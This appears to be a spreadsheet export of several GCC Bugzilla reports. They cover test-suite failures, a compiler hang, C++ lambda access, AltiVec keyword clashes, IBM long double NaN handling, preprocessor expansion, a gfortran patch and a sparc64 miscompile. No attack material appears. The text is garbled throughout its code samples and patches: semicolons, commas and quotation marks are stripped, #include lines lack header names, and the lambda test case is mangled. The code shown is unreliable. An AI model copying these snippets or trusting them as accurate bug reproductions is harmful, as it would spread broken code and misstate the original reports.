Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/compat/compat.exp ...
FAIL: gcc.dg/compat/vector-1 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: gcc.dg/compat/vector-2 c_compat_x_tst.o-c_compat_y_tst.o execute
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/compat/struct-layout-1.exp ...
FAIL: tmpdir-gcc.dg-struct-layout-1/t001 c_compat_x_tst.o compile  (internal compiler error)
FAIL: tmpdir-gcc.dg-struct-layout-1/t001 c_compat_y_tst.o compile  (internal compiler error)
FAIL: tmpdir-gcc.dg-struct-layout-1/t002 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t003 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t004 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t005 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t006 c_compat_x_tst.o compile  (internal compiler error)
FAIL: tmpdir-gcc.dg-struct-layout-1/t006 c_compat_y_tst.o compile  (internal compiler error)
FAIL: tmpdir-gcc.dg-struct-layout-1/t007 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t008 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t009 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t010 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t011 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t012 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t013 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t014 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t015 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t016 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t017 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t018 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t019 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t020 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t021 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t022 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t023 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t024 c_compat_x_tst.o compile  (internal compiler error)
FAIL: tmpdir-gcc.dg-struct-layout-1/t024 c_compat_y_tst.o compile  (internal compiler error)
FAIL: tmpdir-gcc.dg-struct-layout-1/t025 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t026 c_compat_x_tst.o-c_compat_y_tst.o execute
FAIL: tmpdir-gcc.dg-struct-layout-1/t027 c_compat_x_tst.o compile  (internal compiler error)
FAIL: tmpdir-gcc.dg-struct-layout-1/t027 c_compat_y_tst.o compile  (internal compiler error)
FAIL: tmpdir-gcc.dg-struct-layout-1/t028 c_compat_x_tst.o-c_compat_y_tst.o execute
... (non-regressions elided)
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/torture/stackalign/stackalign.exp ...
FAIL: gcc.dg/torture/stackalign/nested-1.c  -O0  execution test
FAIL: gcc.dg/torture/stackalign/nested-2.c  -O0  execution test
FAIL: gcc.dg/torture/stackalign/nested-2.c  -O1  execution test
FAIL: gcc.dg/torture/stackalign/nested-2.c  -O2  execution test
FAIL: gcc.dg/torture/stackalign/nested-2.c  -Os  execution test
FAIL: gcc.dg/torture/stackalign/nested-2.c  -O2 -flto  execution test
FAIL: gcc.dg/torture/stackalign/nested-2.c  -O2 -fwhopr  execution test
FAIL: gcc.dg/torture/stackalign/nested-3.c  -O0  execution test
FAIL: gcc.dg/torture/stackalign/nested-3.c  -O1  execution test
FAIL: gcc.dg/torture/stackalign/nested-3.c  -O2  execution test
FAIL: gcc.dg/torture/stackalign/nested-3.c  -Os  execution test
FAIL: gcc.dg/torture/stackalign/nested-3.c  -O2 -flto  execution test
FAIL: gcc.dg/torture/stackalign/nested-3.c  -O2 -fwhopr  execution test
With the messages in the logfile being:
PASS: gcc.c-torture/execute/20060420-1.c compilation  -O1
program stopped with signal 6.^M
FAIL: gcc.c-torture/execute/20060420-1.c execution  -O1
...
PASS: gcc.c-torture/execute/simd-5.c compilation  -O0
program stopped with signal 6.^M
FAIL: gcc.c-torture/execute/simd-5.c execution  -O0
...
PASS: gcc.dg/compat/vector-1 c_compat_x_tst.o-c_compat_y_tst.o link
core: 4 byte misaligned write to address 0x68676665 at 0xeb0^M
program stopped with signal 10.^M
...
Executing on host: /tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/xgcc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/  -w -I/tmp\
/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/compat -Wno-abi -DSKIP_DECIMAL_FLOAT -DSKIP_DECIMAL_FLOAT -c   -isystem /tmp/\
hpautotest-gcc1/cris-elf/gccobj/cris-elf/./newlib/targ-include -isystem /tmp/hpautotest-gcc1/gcc/newlib/libc/include  -\
o c_compat_x_tst.o /tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/testsuite/gcc/gcc.dg-struct-layout-1//t001_x.c    (timeout \
= 300)
In file included from /tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/testsuite/gcc/gcc.dg-struct-layout-1//t001_x.c:9:0:^M
/tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/testsuite/gcc/gcc.dg-struct-layout-1//t001_test.h: In function 'test85':^M
/tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/testsuite/gcc/gcc.dg-struct-layout-1//t001_test.h:86:1: internal compiler erro\
r: Segmentation fault^M
...
PASS: tmpdir-gcc.dg-struct-layout-1/t002 c_compat_x_tst.o-c_compat_y_tst.o link
core: 4 byte misaligned read to address 0x871fd41f at 0x5500^M
program stopped with signal 10.^M
FAIL: tmpdir-gcc.dg-struct-layout-1/t002 c_compat_x_tst.o-c_compat_y_tst.o execute
other messages similar.
Author of patches in suspect revision range CC:ed.
(I'll provide basic analysis for the execution failures if fixing the compilation SEGV's don't fix them too.)</t>
  </si>
  <si>
    <t>GCC-45792</t>
  </si>
  <si>
    <t>[4.6 Regression]: cris-elf build failure (hangs) due to fix for PR44374</t>
  </si>
  <si>
    <t>Created attachment 21882
Preprocessed dtoa.c
At r164551 the tree built with few regressions.
At r164560 building newlib/libc/stdlib/dtoa.c hangs (cpu-time &gt; 38 hours) and at r164619 the build is at a similar state (didn't wait 38 hours but see below).
Attaching a gdb-session to the running cc1 at r164619 shows an infinite loop in
gcc/emit-rtl.c:reorder_insns:
4027          for (x = from x != NEXT_INSN (to) x = NEXT_INSN (x))
4028            if (!BARRIER_P (x))
4029              df_insn_change_bb (x bb)
But x is bogus it seems to have been deleted or at least removed from the insn stream:
(insn 2210 2210 2210 239 (set (cc0)
        (compare (reg/v/f:SI 3 r3 [orig:95 mlo ] [95])
            (reg/v/f:SI 4 r4 [orig:97 mhi ] [97]))) /tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib/dtoa.c:808 11 {*cmpsi}
     (nil))
The call to df_insn_change_bb takes the (old_bb == new_bb) early return.
Author of suspect patch in revision range CC:ed.
Preprocessed dtoa.c attached.  Compile with -O2.</t>
  </si>
  <si>
    <t>GCC-59483</t>
  </si>
  <si>
    <t>A nested lambda fails to find a protected name with qualified name</t>
  </si>
  <si>
    <t>Test:
struct X { 
protected: 
  int i 
}  
struct Y: X { 
  void f() { 
    [ }() } // #1
}
Output:
eelis.cpp: In lambda function:
eelis.cpp:3:7: error: â€˜int X::iâ€™ is protected
   int i 
       ^
eelis.cpp:8:13: error: within this context
     [ }() } 
             ^
Removing X:: from #1 makes it work. Clang 3.4 accepts the code either
with X:: or without it.</t>
  </si>
  <si>
    <t>GCC-83219</t>
  </si>
  <si>
    <t>[8 regression] c-c++-common/ubsan/unreachable-2.c fails starting with r255201</t>
  </si>
  <si>
    <t>Saw this on powerpc64 both LE and BE.
This test case is looking for a specific failure
c-c++-common/ubsan/unreachable-2.c:11:41: runtime error: execution reached a __builtin_unreachable() call
but after this revision it no longer occurs.
Executing on host: /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++1/../../xg++ -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++1/../../ /home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/ubsan/unreachable-2.c    -fno-diagnostics-show-caret -fdiagnostics-color=never  -nostdinc++ -I/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/libstdc++-v3/include/powerpc64le-unknown-linux-gnu -I/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/libstdc++-v3/include -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/libsupc++ -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/include/backward -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0   -O2  -fsanitize=unreachable    -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/  -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/ubsan/  -L/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/ubsan/.libs  -L/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs  -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs  -L/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libitm/ -L/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libitm/.libs -lm  -o ./unreachable-2.exe    (timeout = 300)
spawn -ignore SIGHUP /home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++1/../../xg++ -B/home/seurer/gcc/build/gcc-trunk/gcc/testsuite/g++1/../../ /home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/ubsan/unreachable-2.c -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/libstdc++-v3/include/powerpc64le-unknown-linux-gnu -I/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/libstdc++-v3/include -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/libsupc++ -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/include/backward -I/home/seurer/gcc/gcc-trunk/libstdc++-v3/testsuite/util -fmessage-length=0 -O2 -fsanitize=unreachable -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/ -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/ubsan/ -L/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/ubsan/.libs -L/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs -L/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs -B/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libitm/ -L/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libitm/.libs -lm -o ./unreachable-2.exe
PASS: c-c++-common/ubsan/unreachable-2.c   -O2  (test for excess errors)
Setting LD_LIBRARY_PATH to .:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libitm/.libs:/home/seurer/gcc/build/gcc-trunk/gcc:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/ubsan/.libs:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs:.:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libitm/.libs:/home/seurer/gcc/build/gcc-trunk/gcc:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libsanitizer/ubsan/.libs:/home/seurer/gcc/build/gcc-trunk/powerpc64le-unknown-linux-gnu/./libstdc++-v3/src/.libs:/home/seurer/gcc/build/gcc-trunk/./gmp/.libs:/home/seurer/gcc/build/gcc-trunk/./prev-gmp/.libs:/home/seurer/gcc/build/gcc-trunk/./mpfr/src/.libs:/home/seurer/gcc/build/gcc-trunk/./prev-mpfr/src/.libs:/home/seurer/gcc/build/gcc-trunk/./mpc/src/.libs:/home/seurer/gcc/build/gcc-trunk/./prev-mpc/src/.libs:/home/seurer/gcc/build/gcc-trunk/./isl/.libs:/home/seurer/gcc/build/gcc-trunk/./prev-isl/.libs:/home/seurer/gcc/install/gcc-7.1.0/lib64
spawn [open ...]
FAIL: c-c++-common/ubsan/unreachable-2.c   -O2  execution test</t>
  </si>
  <si>
    <t>GCC-39558</t>
  </si>
  <si>
    <t>Bad interaction of decls named 'vector' and -maltivec vector support</t>
  </si>
  <si>
    <t>Adding -maltivec to the PowerPC compiler turns on the altivec vector support.  Part of the vector support is to add conditional expansion of the vector keyword if it looks like vector is part of a type declaration (i.e. vector float would declare a single precision floating point 4 element vector or V4SF).  If the next thing after vector is a macro that expands to __attribute__((__unused__)) the compiler will realize that it should expand vector to vector and then glue it with the __attribute__.  I discovered this when doing a bootstrap of the compiler with the power7 VSX instructions enabled (VSX includes Altivec).
This is the declaration in fortran/iresolve.c that shows the problem:
 void
gfc_resolve_pack (gfc_expr *f gfc_expr *array gfc_expr *mask
		  gfc_expr *vector ATTRIBUTE_UNUSED)
{
   /* ... */
}
If we change the argument to something other than vector it will allow the code to be compiled with -maltivec but the underlying problem should be fixed.</t>
  </si>
  <si>
    <t>bje</t>
  </si>
  <si>
    <t>GCC-57363</t>
  </si>
  <si>
    <t>IBM long double: adding NaN and number raises inexact exception</t>
  </si>
  <si>
    <t>For IBM long double adding a normal number to a NaN raises an inexact exception. Adding any number to NaN should not raise any exception. The following testcase triggers the issue (the testcase is meant to run a gnu compatible libc):
--------------------------------------------------------------
$ cat gcc_testcase.c
#include 
#include 
#include 
double
sum (double x long double y)
{
  return x + y
}
int main ()
{
  feenableexcept (FE_INEXACT)
  double x = __builtin_nan ()
  long double y = 1.1L
  printf (%e\n sum (x y))
  return 0
}
$ gcc -O3 -m64 -fno-inline gcc_testcase.c -o gcc_testcase -lm
$ ./gcc_testcase 
Floating point exception (core dumped)
--------------------------------------------------------------
The issue is in __gcc_qadd implementation at libgcc/config/rs6000/ibm-ldouble.c 
if the number if non finite there is not check if it a NaN before actually summing all the components. A possible solution would be to add an extra test and return the first sum if the number if not infinity:
Index: libgcc/config/rs6000/ibm-ldouble.c
===================================================================
--- libgcc/config/rs6000/ibm-ldouble.c  (revision 199159)
+++ libgcc/config/rs6000/ibm-ldouble.c  (working copy)
@@ -1046 +1048 @@
   if (nonfinite (z))
     {
+      if (z != inf())
+       return z
       z = cc + aa + c + a
       if (nonfinite (z))
        return z</t>
  </si>
  <si>
    <t>azanella</t>
  </si>
  <si>
    <t>GCC-962</t>
  </si>
  <si>
    <t>Recursive expansion fails</t>
  </si>
  <si>
    <t>Running gcc -E on
#define foobar(n) [n]
#define X foobar
X(X)
X(X(Y))
yields
[X]
[X(Y)]
but should yield
 [foobar]
 [ [Y]]
However running gcc -E on
#define foobar(n) [n]
#define X foobar
#define X2 foobar
X(X2)
X(X2(Y))
gives the correct result.  It therefore seems that some
faulty anti-recursion check causes the problem.
Release:
GNU CPP version 2.97 20001127 (experimental) (cpplib) (Hitachi SH)
Environment:
Solaris 8</t>
  </si>
  <si>
    <t>GCC-26741</t>
  </si>
  <si>
    <t>Elemental functions not permitted in initialization expressions</t>
  </si>
  <si>
    <t xml:space="preserve">In testing gfortran's capacity to deal with iso_varying_string it was found that the error Specification function 'len_' at (1) must be PURE was produced - see testcase below.  This is obviously incorrect because elemental functions are pure.
The patch and the testcase appear below.
Paul Thomas
! { dg-do compile }
! Tests the fix for elemental functions not being allowed in
! specification expressions in pure procedures.
!
! Testcase from iso_varying_string by Rich Townsend 
! The allocatable component has been changed to a pointer for this testcase.
!
module iso_varying_string
  type varying_string
     private
     character(LEN=1) dimension(:) pointer :: chars
  end type varying_string
  interface len
     module procedure len_
  end interface len
contains
  pure function char_auto (string) result (char_string)
    type(varying_string) intent(in) :: string
    character(LEN=len(string))       :: char_string ! Error was here
  end function char_auto
  elemental function len_ (string) result (length)
    type(varying_string) intent(in) :: string
    integer                          :: length
  end function len_
end module iso_varying_string
Index: gcc/fortran/expr.c
===================================================================
*** gcc/fortran/expr.c	(revision 112139)
--- gcc/fortran/expr.c	(working copy)
*************** external_spec_function (gfc_expr * e)
*** 16361642 ****
        return FAILURE
      }
!   if (!f-&gt;attr.pure)
      {
        gfc_error (Specification function '%s' at %L must be PURE f-&gt;name
--- 16361642 ----
        return FAILURE
      }
!   if (!f-&gt;attr.pure &amp;&amp; !f-&gt;attr.elemental)
      {
        gfc_error (Specification function '%s' at %L must be PURE f-&gt;name
  		 </t>
  </si>
  <si>
    <t>GCC-63361</t>
  </si>
  <si>
    <t>Test case c-c++-common/ubsan/float-cast-overflow-1.c fails on Pentium2</t>
  </si>
  <si>
    <t>Rev: 215226
FAIL: c-c++-common/ubsan/float-cast-overflow-1.c   -O0  output pattern test is (/home/ed/gnu/gcc-build/gcc/testsuite/gcc/float-cast-overflow-1.exe+0x8048604): runtime error: value -133 is outside the range of representable values of type 'signed char'
FAIL: c-c++-common/ubsan/float-cast-overflow-1.c   -O1  output pattern test is (/home/ed/gnu/gcc-build/gcc/testsuite/gcc/float-cast-overflow-1.exe+0x80485eb): runtime error: value -133 is outside the range of representable values of type 'signed char'
FAIL: c-c++-common/ubsan/float-cast-overflow-1.c   -O2  output pattern test is (/home/ed/gnu/gcc-build/gcc/testsuite/gcc/float-cast-overflow-1.exe+0x804f647): runtime error: value -133 is outside the range of representable values of type 'signed char'
FAIL: c-c++-common/ubsan/float-cast-overflow-1.c   -O3 -fomit-frame-pointer  output pattern test is (/home/ed/gnu/gcc-build/gcc/testsuite/gcc/float-cast-overflow-1.exe+0x804f647): runtime error: value -133 is outside the range of representable values of type 'signed char'
FAIL: c-c++-common/ubsan/float-cast-overflow-1.c   -O3 -g  output pattern test is /home/ed/gnu/gcc-trunk/gcc/testsuite/c-c++-common/ubsan/float-cast-overflow-1.c:17: runtime error: value -133 is outside the range of representable values of type 'signed char'
FAIL: c-c++-common/ubsan/float-cast-overflow-1.c   -Os  output pattern test is (/home/ed/gnu/gcc-build/gcc/testsuite/gcc/float-cast-overflow-1.exe+0x8048505): runtime error: value -133 is outside the range of representable values of type 'signed char'
FAIL: c-c++-common/ubsan/float-cast-overflow-1.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  output pattern test is (/home/ed/gnu/gcc-build/gcc/testsuite/gcc/float-cast-overflow-1.exe+0x804f647): runtime error: value -133 is outside the range of representable values of type 'signed char'
FAIL: c-c++-common/ubsan/float-cast-overflow-1.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  output pattern test is (/home/ed/gnu/gcc-build/gcc/testsuite/gcc/float-cast-overflow-1.exe+0x804f657): runtime error: value -133 is outside the range of representable values of type 'signed char'
cat /proc/cpuinfo 
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 5
model name	: Pentium II (Deschutes)
stepping	: 2
microcode	: 0x2a
cpu MHz		: 448.822
cache size	: 512 KB
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 2
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pse36 mmx fxsr
bogomips	: 897.64
clflush size	: 32
cache_alignment	: 32
address sizes	: 36 bits physical 32 bits virtual
power management:
processor	: 1
vendor_id	: GenuineIntel
cpu family	: 6
model		: 5
model name	: Pentium II (Deschutes)
stepping	: 2
microcode	: 0x2a
cpu MHz		: 448.822
cache size	: 512 KB
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 2
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pse36 mmx fxsr
bogomips	: 897.67
clflush size	: 32
cache_alignment	: 32
address sizes	: 36 bits physical 32 bits virtual
power management:</t>
  </si>
  <si>
    <t>GCC-7560</t>
  </si>
  <si>
    <t>[sparc64] copy construction (return value optimization?)</t>
  </si>
  <si>
    <t>I'm using both gcc-3.1 [cross and native] and gcc-3.1.1 [cross] for the sparc64-sun-solaris2.8 target.  This bug only shows up when build 64-bit sparc targets AFAIK.
starbug:/starbug/spencer$ /opt/gcc-3.1.1-cross/sparc64-sun-solaris2.8/bin/sparc64-sun-solaris2.8-g++ -v
Reading specs from /opt/gcc-3.1.1-cross/sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1.1/specs
Configured with: ../../gcc-3.1.1/configure --with-dwarf2 --enable-languages=cc++ --enable-threads=single --disable-shared --prefix=/opt/gcc-3.1.1-cross/sparc64-sun-solaris2.8 --target=sparc64-sun-solaris2.8 -v --with-headers=/starbug/spencer/devel/gcc-cross/sparc64-sun-solaris2.8/target-stuff/include/ --with-lib=/opt/gcc-3.1.1-cross/sparc64-sun-solaris2.8/sparc64-sun-solaris2.8/lib --with-gnu-as --with-gnu-ld --disable-multilib
Thread model: single
gcc version 3.1.1
starbug:/starbug/spencer$ /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/bin/sparc64-sun-solaris2.8-g++ -v
Reading specs from /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/specs
Configured with: ../gcc-3.1/configure --with-dwarf2 --enable-languages=cc++ --enable-threads=single --disable-shared --prefix=/opt/gcc-3.1-cross-sparc64-sun-solaris2.8 --target=sparc64-sun-solaris2.8 -v --with-headers=/starbug/spencer/devel/gcc-cross/target-stuff/include/ --with-lib=/starbug/spencer/devel/gcc-cross/target-stuff/lib --with-gnu-as --with-gnu-ld --disable-multilib
Thread model: single
gcc version 3.1
netra-1:~$ /opt/gcc-3.1/bin/g++ -v        
Reading specs from /opt/gcc-3.1/lib/gcc-lib/sparc-sun-solaris2.8/3.1/specs
Configured with: ../gcc-3.1/configure --with-dwarf2 --enable-languages=cc++ --enable-threads=single --disable-shared --with-gnu-as --with-gnu-ld --with-as=/opt/bin/as --with-ld=/opt/bin/ld --prefix=/opt/gcc-3.1
Thread model: single
gcc version 3.1
When running the following code compiled with any of these three compilers with optimizations on the output is incorrect (see comments).  What I suspect is happening is that the m_container member of Container::iterator is being  treated as if it was only 32-bit during some optimization.  
Here is the code sample:
+++BEGIN
//*****************************************************************************
// Shows bug when compiled with gcc-3.1 or gcc-3.1.1 at -O2 or higher for
// sparc64-sun-solaris2.8.
//
// When compiled with -O or no optimizations gives correct output:
// /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/bin/sparc64-sun-solaris2.8-g++ 
//   -Wall -o optfoo optfoo.cc -O
//  *** begin: [0xffffffff7ffff9bf 0 0] end: [0xabcd 123456 1]
//  Not equal
//
// But when build with -O2 or higher gives incorrect output:
// /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/bin/sparc64-sun-solaris2.8-g++ 
//   -Wall -o optfoo optfoo.cc -O2
//  *** begin: [0xffffffff7ffff9cf 0 0] end: [0xabcd 0 0]
//  equal
//
// Removing the const qualifier from the two const members of iterator also
// avoids the bug even on -O6:
// /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/bin/sparc64-sun-solaris2.8-g++ 
//   -Wall -o optfoo optfoo.cc -O2 -DFOO_NO_CONST_MEMBERS
//  *** begin: [0xffffffff7ffff9cf 0 0] end: [0xabcd 123456 1]
//  Not equal
#include 
#include 
#include 
// If FOO_NO_CONST_MEMBERS is set then skip the const on the iterator members
#if FOO_NO_CONST_MEMBERS
# define DEBUG_CONST
#else
# define DEBUG_CONST const
#endif
//=============================================================================
using std::cout
using std::endl
class Container
{
public:
  class iterator
  {
    // Not allowed
    void operator=(const iterator 
  public:
    // creates as 'end'
    iterator()
      : m_container((Container *)0xABCD) m_all(true) m_idx(123456)
    {}
    bool operator!=(const iterator &amp;rhs) const
    {
      return m_idx != rhs.m_idx
    }
    // Return the packet itself
    const Container *getContainer() const { return m_container }
    unsigned int getIdx() const { return m_idx }
    bool getAll() const { return m_all }
  protected:
    friend class Container
    iterator(const Container *punsigned int i)
      : m_container(p) m_all(false) m_idx(i) {}
    explicit iterator(const Container *p)
      : m_container(p) m_all(true) m_idx(0) {}
    bool isValid() const {
      return m_container!=NULL
    }
  private:
    const Container * DEBUG_CONST m_container
    DEBUG_CONST bool m_all
    unsigned int m_idx
  }
  iterator get() const { return iterator(this 1) }
  iterator begin() const { return iterator(this 0) }
  iterator end() const { return iterator() }
}
template&lt;typename directly_supported_type
  typename attribute_tag&gt;
class DirectSupportIterator
  : public Container::iterator
    public std::iterator
{
private:
  // :: --------------------------------------------------------------------
  // :: Type Information
  typedef Container::iterator BaseClass
public:
  // The value we dereference into
  typedef directly_supported_type value_type
public:
  // :: --------------------------------------------------------------------
  // :: Construction
  // Copy construct from base class
  DirectSupportIterator(const BaseClass &amp;it)
    : BaseClass(it)
  {}
  // Make end version
  DirectSupportIterator()
    : BaseClass()
  {}
  // Default copy and assignemnt
}
typedef int SomeType
typedef DirectSupportIterator IteratorType
class Wrapper
{
  Container p
public:
  IteratorType begin() const { return p.begin() }
  static IteratorType end() { return IteratorType() }
}
int
main()
{
  std::ios::sync_with_stdio(false)
  Wrapper w
  IteratorType begin = w.begin()
  const IteratorType end = Wrapper::end()
  cout &lt;&lt; *** begin: [
       &lt;&lt; begin.getContainer() &lt;&lt;   &lt;&lt; begin.getIdx()
       &lt;&lt;   &lt;&lt; begin.getAll() &lt;&lt; ] end: [
       &lt;&lt; end.getContainer() &lt;&lt;   &lt;&lt; end.getIdx()
       &lt;&lt;   &lt;&lt; end.getAll() &lt;&lt; ']' &lt;&lt; std::endl
  // Avoid logging if this field is not present
  if(begin != end) {
    cout &lt;&lt; Not equal &lt;&lt; endl
  } else {
    cout &lt;&lt; equal &lt;&lt; endl
  }
  return 0
}
+++END
[ - - - ]
Here it is being built by gcc-3.1.1 (a cross compiler):
starbug:/starbug/spencer$ /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/bin/sparc64-sun-solaris2.8-g++ -Wall -o optfoo optfoo.cc -O2 -v
Reading specs from /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/specs
Configured with: ../gcc-3.1/configure --with-dwarf2 --enable-languages=cc++ --enable-threads=single --disable-shared --prefix=/opt/gcc-3.1-cross-sparc64-sun-solaris2.8 --target=sparc64-sun-solaris2.8 -v --with-headers=/starbug/spencer/devel/gcc-cross/target-stuff/include/ --with-lib=/starbug/spencer/devel/gcc-cross/target-stuff/lib --with-gnu-as --with-gnu-ld --disable-multilib
Thread model: single
gcc version 3.1
